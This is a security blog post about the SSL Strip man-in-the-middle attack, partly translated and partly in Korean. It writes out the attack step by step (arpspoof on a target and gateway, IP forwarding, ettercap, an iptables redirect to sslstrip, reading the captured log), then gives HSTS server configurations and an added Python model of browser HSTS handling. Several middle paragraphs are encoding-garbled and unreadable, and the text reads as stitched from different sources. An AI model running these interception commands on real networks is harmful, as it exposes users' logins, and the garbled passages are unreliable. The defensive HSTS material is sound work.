
WEB

SSL Strip vulnerability

2020. 10. 21.
Overview

This attack was first presented in 2009 by Moxie Marlinspike, who was a security researcher at the time. It is a kind of MITM (Man In The Middle) attack that downgrades a website using an HTTPS (HyperText Transfer Protocol over Secure Socket Layer) public-key encrypted connection to plain HTTP communication.

The interesting part of this vulnerability is that, even while under attack, nothing related to an SSL certificate error is shown on the user's side, so the user has no clue that an SSL Strip attack is taking place.

 

How it happens

The first step is either poisoning the ARP table through ARP spoofing or luring the user into joining the attacker's wireless network.

When a user establishes a session with a web server, TCP communication happens first, and only afterwards is the connection redirected to TLS/SSL. At this point the attacker strips the SSL layer, downgrades the connection, and can easily read the data flowing in both directions.

When you visit a Tistory page as usual, the connection is encrypted, as the padlock shown at the top of the browser indicates, so sensitive information entered at login is not exposed in the packet flow.

An attacker sitting on the same network can poison ARP and try to force the communication onto plaintext HTTP in order to obtain the user's login information.

<!-- ARP spoofing attempt -->
      arpspoof -i <interface> -t <target IP> <gateway IP>
      arpspoof -i <interface> -t <gateway IP> <target IP>

<!-- Enable IP forwarding (either of the two) -->
      fragrouter -B1
      echo 1 > /proc/sys/net/ipv4/ip_forward

<!-- Run ettercap -->
      ettercap -i <interface> -T -q
      -T : text mode
      -q : quiet mode, i.e. do not print unnecessary output

<!-- Redirect every packet arriving with destination port 80 to port 10000 -->
      iptables -t nat -A PREROUTING -p tcp --destination-port 80 -j REDIRECT --to-ports 10000
      -t nat : use the nat table
      -A PREROUTING : chain of the nat table that processes packets as soon as they are received
      -p tcp : match the TCP protocol (port 80 HTTP runs over reliable TCP)
      --destination-port 80 : destination port 80
      -j REDIRECT : jump, i.e. redirect
      --to-ports 10000 : sslstrip listens on port 10000 by default

<!-- Monitoring the target after the attack is run -->
      tail -f sslstrip.log

* Empty the log file: cat /dev/null > sslstrip.log

๊ณต๊ฒฉ์„ ๋‹นํ•œ ํ›„ ํ‰์†Œ๋Œ€๋กœ www.tistory.com์„ ์ž…๋ ฅํ•˜๊ณ  ์ ‘์†ํ•˜๋ฉด ์ฃผ์†Œ์ฐฝ์˜ URL ๋ถ€๋ถ„์— ์ž๋ฌผ์‡ ๊ฐ€ ํ’€๋ ค์žˆ๋Š” ๊ฒƒ์„ ํ™•์ธํ•  ์ˆ˜ ์žˆ๋‹ค. ๊ทธ ์™ธ์—๋Š” ์•„๋ฌด๋Ÿฐ ์œก์•ˆ์œผ๋กœ ํ™•์ธํ•  ์ˆ˜ ์žˆ๋Š” ์ด๋ฒคํŠธ๊ฐ€ ์—†๊ธฐ ๋•Œ๋ฌธ์— ์‰ฝ๊ฒŒ ๋ˆˆ์น˜์ฑŒ ์ˆ˜ ์—†์Šต๋‹ˆ๋‹ค.

 

์•„๋ฌด๊ฒƒ๋„ ๋ชจ๋ฅธ ์ฑ„ ๋กœ๊ทธ์ธ์„ ์‹œ๋„ํ•œ ์‚ฌ์šฉ์ž๋Š” ํ‰์†Œ์ฒ˜๋Ÿผ ์›น ์„œํ•‘์„ ์ฆ๊ธฐ๊ณ  ์žˆ๊ฒ ์ง€๋งŒ ๊ณต๊ฒฉ์ž๊ฐ€ ARP ์ค‘๋…์„ ์‹œํ‚ด์œผ๋กœ์จ ์ค‘๊ฐ„์— ๋ชจ๋“  ํŠธ๋ž˜ํ”ฝ์„ ํ‰๋ฌธ์œผ๋กœ ํ™•์ธํ•  ์ˆ˜๊ฐ€ ์žˆ๊ฒŒ ๋ฉ๋‹ˆ๋‹ค.

 


์ทจ์•ฝ์ ์ด ๋ฐœ์ƒํ•œ ์›์ธ

SSL Strip ์ด ์ƒ๊ธด ๊ธฐ์›์€ ์‚ฌ์šฉ์ž๋“ค์ด URL ๋˜๋Š” ๋ถ๋งˆํฌ ๋œ https:// ๋ฅผ ์ง์ ‘ ์ž…๋ ฅํ•˜์—ฌ SSL ์ด ์ ์šฉ๋œ ์›น ์‚ฌ์ดํŠธ๋ฅผ ์ ‘์†ํ•˜์ง€ ์•Š๊ณ  ๋‹จ์ˆœํžˆ tistory.com๊ณผ ๊ฐ™์ด ์ฃผ์†Œ๋งŒ ์ž…๋ ฅํ•˜์—ฌ ๋“ค์–ด๊ฐ„๋‹ค๋Š” ๊ฒƒ์ž…๋‹ˆ๋‹ค.

 

์˜ฌ๋ฐ”๋ฅธ ๋Œ€์‘๋ฐฉ์•ˆ์€ ์•„๋‹ˆ์ง€๋งŒ ๊ณต๊ณต ๋„คํŠธ์›Œํฌ์—์„œ๋Š” ์ ‘์† ์‹œ ๋˜๋„๋ก https ๊ฐ€ ๋ถ™์€ ๋งํฌ๋ฅผ ํ†ตํ•ด ๋“ค์–ด๊ฐ€๊ฑฐ๋‚˜ ์ž…๋ ฅ์„ ํ•˜๋Š” ๊ฒƒ์ด ์ค‘์š”ํ•ฉ๋‹ˆ๋‹ค. SSL Strip ๊ณต๊ฒฉ์„ ์ด๋ฏธ ๋‹นํ•˜๊ณ  ์žˆ๋‹ค ํ•˜๋”๋ผ๊ณ  https๋ฅผ ์ˆ˜๊ธฐ๋กœ ์ž…๋ ฅํ•ด ๋“ค์–ด๊ฐ„ ์‚ฌ์šฉ์ž์˜ ์ •๋ณด๋Š” ๊ฐˆ์ทจํ•  ์ˆ˜ ์—†์Šต๋‹ˆ๋‹ค.

 

๋˜ํ•œ http(๋ฉ”์ธ)์™€ https(๋กœ๊ทธ์ธ, ๊ฒฐ์ œ, ํšŒ์›๊ฐ€์ž… ๋“ฑ)๋ฅผ ๋ฒˆ๊ฐˆ์•„ ์“ฐ๋Š” ๊ณณ์ด ๋งŽ๋‹ค๋Š” ๊ฒƒ์ž…๋‹ˆ๋‹ค. ์ด๋Ÿฌํ•œ ๋ฐฉ๋ฒ•์€ SSL Strip ๊ณต๊ฒฉ์— ๋…ธ์ถœ๋  ๊ฐ€๋Šฅ์„ฑ์ด ๋†’์Šต๋‹ˆ๋‹ค. 

* ํ˜„์žฌ ๋„ค์ด๋ฒ„, ๊ตฌ๊ธ€, ๋‹ค์Œ, ํŽ˜์ด์Šค๋ถ ๊ฐ™์€ ๊ธ€๋กœ๋ฒŒ ํŽ˜์ด์ง€์˜ ๊ฒฝ์šฐ ์ „ ๊ตฌ๊ฐ„ https ๋ฅผ ์‚ฌ์šฉ์ค‘

 

๋Œ€์‘ ๋ฐฉ์•ˆ

๋น„์šฉ๊ณผ ๋ชจ๋“  Byte์˜ ์ •๋ณด๋ฅผ ์‚ฌ์šฉ์ž์™€ ์„œ๋ฒ„๊ฐ€ ์•”ํ˜ธํ™” ๋ฐ ํ•ด๋…์„ ํ•ด์•ผ ํ•˜๊ธฐ ๋•Œ๋ฌธ์— ์†๋„๊ฐ€ ๋Š๋ ค์งˆ ์ˆ˜๋ฐ–์— ์—†๋Š” ๋‹จ์ ์ด ์กด์žฌํ•˜๊ธฐ ๋•Œ๋ฌธ์— ์„œ๋น„์Šค์˜ ํ’ˆ์งˆ ์ชฝ์„ ๋” ์ค‘์š”์‹œ ์—ฌ๊ธฐ๊ณค ํ•ฉ๋‹ˆ๋‹ค.

 

์˜ฌ๋ฐ”๋ฅด๊ฒŒ ๋ณดํ˜ธํ•˜๊ธฐ ์œ„ํ•ด์„  ์ „๊ตฌ๊ฐ„ https๋ฅผ ์‚ฌ์šฉํ•˜๋Š” ๊ฒƒ์ด ์ข‹์ง€๋งŒ ์ด์™ธ์—๋„ ์„œ๋ฒ„์ธก ์—์„œ ์กฐ์น˜ํ•  ์ˆ˜ ์žˆ๋Š” HSTS(HTTP Stric Transport Security)๋ฅผ ์ ์šฉํ•˜๋Š”๊ฒƒ์ด ์ข‹์Šต๋‹ˆ๋‹ค.

 

HSTS๋Š” ํ•ด๋‹น ์„œ๋น„์Šค๋ฅผ ์ด์šฉํ•˜๋Š” ์‚ฌ์šฉ์ž๊ฐ€ https ๋กœ๋งŒ ์—ฐ๊ฒฐ๋˜๋„๋ก ๋ช…๋ นํ•˜๋Š” ํ˜•ํƒœ์ž…๋‹ˆ๋‹ค. ์ฃผ๋กœ ๋Œ€ํ˜• ํฌํ„ธ์‚ฌ์ดํŠธ์˜ ๊ฒฝ์šฐ HSTS ๊ฐ€ ์ ์šฉ๋˜์–ด์žˆ๋Š” ํŽธ์ด๋ฉฐ ์ด๋ฅผ ์ ์šฉํ•˜๋ฉด SSL Strip ๊ณต๊ฒฉ์„ ๋ฌด๋ ฅํ™” ์‹œํ‚ฌ ์ˆ˜ ์žˆ์Šต๋‹ˆ๋‹ค.

// NGINX configuration
// The includeSubDomains parameter applies the HSTS policy to every subdomain of the current domain as well
// NGINX before version 1.7.5 (or NGINX Plus before R5) does not support the always parameter

server {
    listen 443 ssl;
    server_name www.example.com;

    add_header Strict-Transport-Security "max-age=31536000; includeSubDomains" always;
}
// Apache configuration
// Adding the includeSubDomains argument extends the policy to subdomains
// 63072000 seconds (2 years)

/etc/apache2/sites-enabled/

<VirtualHost *:443>
...
Header always set Strict-Transport-Security "max-age=63072000; includeSubDomains"
...
</VirtualHost>
// Apache Tomcat (8.x) configuration
// Edit the web.xml file, uncomment the httpHeaderSecurity filter definition and the
// <filter-mapping> section, and add the hstsMaxAgeSeconds parameter as shown below
// (the HttpHeaderSecurityFilter parameter names are hstsEnabled, hstsMaxAgeSeconds and hstsIncludeSubDomains)

<filter>
 <filter-name>httpHeaderSecurity</filter-name>
 <filter-class>org.apache.catalina.filters.HttpHeaderSecurityFilter</filter-class>
 <init-param>
  <param-name>hstsEnabled</param-name>
  <param-value>true</param-value>
 </init-param>
 <init-param>
  <param-name>hstsMaxAgeSeconds</param-name>
  <param-value>31536000</param-value>
 </init-param>
 <init-param>
  <param-name>hstsIncludeSubDomains</param-name>
  <param-value>true</param-value>
 </init-param>
 <async-supported>true</async-supported>
</filter>

<filter-mapping>
 <filter-name>httpHeaderSecurity</filter-name>
 <url-pattern>/*</url-pattern>
 <dispatcher>REQUEST</dispatcher>
</filter-mapping>
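All three configurations above end up sending the same Strict-Transport-Security header; what makes it stop SSL Strip is what the browser does with it afterwards. The following is an added example written for this post (not the author's code and not part of NGINX, Apache or Tomcat) that parses the header the way RFC 6797 describes, caches the policy per host, and decides whether a later plain http:// navigation gets upgraded before any request leaves the machine. The class and function names, the host names and the clock are all invented for the example.

```python
"""Added example (not from the original post): a minimal model of browser-side
HSTS handling, so the effect of the server headers configured above can be
checked offline. Host names and header values are constructed."""
import re
import time
from urllib.parse import urlsplit, urlunsplit

# One directive: name, optionally "= value" (value may be quoted).
_DIRECTIVE = re.compile(r"\s*([A-Za-z-]+)\s*(?:=\s*\"?([^;\"]*)\"?)?\s*")


def parse_hsts(header):
    """Return {'max_age': int, 'include_subdomains': bool}, or None when the
    header is invalid (max-age missing or non-numeric), in which case a
    browser ignores it and no policy is stored."""
    max_age = None
    include_sub = False
    for part in header.split(";"):
        m = _DIRECTIVE.fullmatch(part)
        if not m:
            continue
        name, value = m.group(1).lower(), m.group(2)
        if name == "max-age":
            if value is None or not value.isdigit():
                return None
            max_age = int(value)
        elif name == "includesubdomains":
            include_sub = True
    if max_age is None:
        return None
    return {"max_age": max_age, "include_subdomains": include_sub}


class HstsStore:
    """Per-host policy cache. `now` is injectable so expiry can be tested."""

    def __init__(self, now=time.time):
        self._now = now
        self._policies = {}   # host -> (expiry timestamp, include_subdomains)

    def observe(self, host, header):
        """Record a policy. Call this only for responses received over HTTPS:
        RFC 6797 requires the header to be ignored on plain HTTP, precisely so
        that a man in the middle cannot plant or clear a policy."""
        policy = parse_hsts(header)
        if policy is None:
            return False
        host = host.lower()
        if policy["max_age"] == 0:          # max-age=0 deletes the entry
            self._policies.pop(host, None)
            return True
        self._policies[host] = (self._now() + policy["max_age"], policy["include_subdomains"])
        return True

    def is_known(self, host):
        """True if host, or a parent domain with includeSubDomains, has an unexpired policy."""
        host = host.lower()
        labels = host.split(".")
        for i in range(len(labels)):
            candidate = ".".join(labels[i:])
            entry = self._policies.get(candidate)
            if entry is None:
                continue
            expires, include_sub = entry
            if expires <= self._now():
                continue
            if candidate == host or include_sub:
                return True
        return False

    def rewrite(self, url):
        """Upgrade http:// to https:// for known hosts; otherwise return the URL unchanged.
        A stripped http:// link therefore never produces a plaintext request."""
        parts = urlsplit(url)
        if parts.scheme == "http" and self.is_known(parts.hostname or ""):
            return urlunsplit(("https",) + tuple(parts[1:]))
        return url


if __name__ == "__main__":
    store = HstsStore()
    store.observe("www.example.com", "max-age=31536000; includeSubDomains")
    print(store.rewrite("http://www.example.com/login"))   # upgraded
    print(store.rewrite("http://other.example.org/"))      # unchanged
```

The first visit still has to reach the site over HTTPS once for the policy to be learned, which is why the post's advice to type https yourself on public networks remains relevant; browser preload lists close that gap but are outside what the configurations above do.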